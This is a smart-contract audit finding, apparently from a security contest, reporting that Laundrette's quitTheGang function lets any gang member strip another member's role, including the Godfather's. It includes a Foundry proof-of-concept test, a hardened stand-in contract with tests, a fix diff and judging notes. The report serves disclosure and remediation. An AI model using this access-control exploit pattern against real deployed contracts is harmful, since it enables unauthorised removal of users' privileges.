Submission Details
Severity: medium
Valid

Malicious gang members can make other gang members leave the gang

Summary

Malicious gang members can make other gang members leave the gang.

Vulnerability Details

The Laundrette::quitTheGang() function lacks the isAuthorizedOrRevert modifier, allowing a malicious gang member to pass in the address of another gang member and revoke that member's gangmember role.

function quitTheGang(address account) external onlyRole("gangmember") {
    kernel.revokeRole(Role.wrap("gangmember"), account);
}

A malicious gang member can call the function with the Godfather's address, causing the Godfather to lose not only their gang member role but also the privileges that depend on it.

POC

function test_rebel() public {
    address gangMember = makeAddr("gangMember");
    joinGang(gangMember);
    // An ordinary gang member revokes the Godfather's gangmember role.
    vm.prank(gangMember);
    laundrette.quitTheGang(godFather);
    // The Godfather can no longer exercise gang-member privileges.
    vm.startPrank(godFather);
    vm.expectRevert();
    laundrette.addToTheGang(godFather);
    vm.expectRevert();
    laundrette.takeGuns(gangMember, 1);
    vm.stopPrank();
}

Place the PoC into test/Laundrette.t.sol.t.sol, and execute with

forge test --mt test_rebel
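To show the hardened behaviour end to end, here is an added, self-contained Foundry test that is not the project's code: MiniKernel is a constructed stand-in for the real kernel, and the isAuthorizedOrRevert definition is an assumption (caller must equal account) rather than the project's own modifier.

```solidity
pragma solidity ^0.8.20;
import {Test} from "forge-std/Test.sol";
// Constructed stand-in for the kernel: one role, tracked per address (no caller checks, test-only).
contract MiniKernel {
    mapping(address => bool) public isGangMember;
    function grant(address a) external { isGangMember[a] = true; }
    function revoke(address a) external { isGangMember[a] = false; }
}
// Hardened quitTheGang: a caller may only revoke their own membership.
contract HardenedLaundrette {
    MiniKernel public kernel;
    error Unauthorized(address caller, address account);
    constructor(MiniKernel k) { kernel = k; }
    modifier onlyGangMember() { require(kernel.isGangMember(msg.sender), "not a gang member"); _; }
    // Assumed definition of isAuthorizedOrRevert (not the project's): caller must be the account itself.
    modifier isAuthorizedOrRevert(address account) {
        if (msg.sender != account) revert Unauthorized(msg.sender, account);
        _;
    }
    function quitTheGang(address account) external onlyGangMember isAuthorizedOrRevert(account) {
        kernel.revoke(account);
    }
}
contract QuitTheGangTest is Test {
    MiniKernel kernel;
    HardenedLaundrette laundrette;
    address godFather = makeAddr("godFather");
    address gangMember = makeAddr("gangMember");
    function setUp() public {
        kernel = new MiniKernel();
        laundrette = new HardenedLaundrette(kernel);
        kernel.grant(godFather);
        kernel.grant(gangMember);
    }
    // The original PoC path: a member targeting the Godfather now reverts and the role survives.
    function test_cannotRemoveOthers() public {
        vm.prank(gangMember);
        vm.expectRevert(abi.encodeWithSelector(HardenedLaundrette.Unauthorized.selector, gangMember, godFather));
        laundrette.quitTheGang(godFather);
        assertTrue(kernel.isGangMember(godFather));
    }
    // Leaving voluntarily still works for the caller's own address.
    function test_canQuitSelf() public {
        vm.prank(gangMember);
        laundrette.quitTheGang(gangMember);
        assertFalse(kernel.isGangMember(gangMember));
    }
}
```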

Impact

  1. Malicious gang members can make other gang members leave the gang.

  2. A malicious gang member can cause the Godfather to lose their rightful privileges.

Tools Used

Manual review, Foundry

Recommendations

Add the isAuthorizedOrRevert modifier to the quitTheGang() function.

- function quitTheGang(address account) external onlyRole("gangmember") {
+ function quitTheGang(address account) external onlyRole("gangmember") isAuthorizedOrRevert(account) {
kernel.revokeRole(Role.wrap("gangmember"), account);
}
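
Review bot: the diff adds isAuthorizedOrRevert(account) but the modifier's definition does not appear on the page; confirm it rejects any caller other than account itself (or an explicitly authorised role such as the Godfather), since a modifier that only checks that the caller holds some role would leave the original issue in place. A regression test in which a gang member calls quitTheGang with another member's address and expects a revert would lock the fix in.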

Updates

Lead Judging Commences

n0kto Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Gang members ban other members
